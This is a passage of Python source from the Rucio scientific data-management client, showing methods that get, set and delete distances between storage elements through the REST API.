url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='PUT', data=dumps(parameters))
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
raise exc_cls(exc_msg)
def get_distance(self, source, destination):
"""
Get distances between rses.
:param source: The source RSE.
:param destination: The destination RSE.
:returns distance: List of dictionaries.
"""
path = [self.RSE_BASEURL, source, 'distances', destination]
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='GET')
if r.status_code == codes.ok:
return next(self._load_json_data(r))
exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
raise exc_cls(exc_msg)
def delete_distance(self, source, destination):
"""
Delete distances with the given RSE ids.
:param source: The source.
:param destination: The destination.
"""
path = [self.RSE_BASEURL, source, 'distances', destination]
path = '/'.join(path)
url = build_url(choice(self.list_hosts), path=path)
r = self._send_request(url, type_='DEL')
if r.status_code == codes.ok:
return True
exc_cls, exc_msg = self._get_exception(headers=r.headers,
status_code=r.status_code,
data=r.content)
raise exc_cls(exc_msg) | /rucio-clients-32.2.0.tar.gz/rucio-clients-32.2.0/lib/rucio/client/rseclient.py | 0.758063 | 0.25488 | rseclient.py | pypi |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.